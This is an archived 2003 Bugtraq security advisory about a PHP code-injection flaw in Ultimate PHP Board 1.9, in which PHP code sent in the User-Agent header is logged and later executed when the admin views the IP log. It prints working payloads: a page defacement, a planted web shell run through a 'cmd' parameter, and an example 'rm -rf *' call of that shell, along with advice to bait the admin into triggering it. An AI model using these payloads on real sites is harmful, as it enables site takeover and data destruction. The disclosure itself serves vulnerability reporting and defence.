lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <3ECF7FF1.000003.04741@soapbox.yandex.ru>
Date: Sat, 24 May 2003 18:21:37 +0400 (MSD)
From: "euronymous" <just-a-user@...dex.ru>
To: vuln@...urity.nnov.ru, bugtraq@...urityfocus.com
Subject: UPB: Discussion Board/Web-Site Takeover


=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: UPB: Discussion Board/Web-Site Takeover
product: Ultimate PHP Board v1.9 [ latest ]
vendor: www.myupb.com
risk: high
date: 05/24/2k3
discovered by: euronymous /F0KP 
advisory urls: http://f0kp.iplus.ru/bz/024.en.txt
               http://f0kp.iplus.ru/bz/024.ru.txt 
contact email: euronymous@...us.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=


description
-----------

there is serious vuln, that allow to attacker execute random php
code. the UPB logs some visitor info [ such as REMOTE_ADDR and 
HTTP_USER_AGENT ] in text file under `db' directory named `iplog'.
then in admin panel board admin can to call admin_iplog.php, that
just include `iplog'. Thats 0k, but..

e@...e_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>

when admin call the admin_iplog.php your php code will executed.

examples for kodsweb skids:

1. <? system( "echo \'hacked\' > ../index.html" ); ?>

will deface forum main page

2. <? system( "echo \'<? system( $cmd ); ?>\' > ../../tcsh.php" ); ?>

will create tcsh.php in wwwroot with httpd privileges.
then you just go to http://hostname/tcsh.php?cmd=rm -rf *

after inject code through User-Agent field you have wait for admin see 
the admin_iplog.php. how to make admin see the iplog?? its quite easy 
== just annoy the admin, use the swearing in board messages, etc.


bonus
-----

in http://www.securityfocus.com/archive/1/302459 i just wrote 
about some vuln in prior versions of UPB. and i wanna say, that 
some described vulns else exists in 1.9!!

have a nice day >:E


shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru, 
N0b0d13s Team and all russian security guyz!! 
to kate especially )) 
hates: slavomira and other dirty ppl in *.kz $#%&^!  
k0dsweb lamers team == yeah, i really __HATE__ yours!!
          

================
im not a lame,
not yet a hacker
================

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ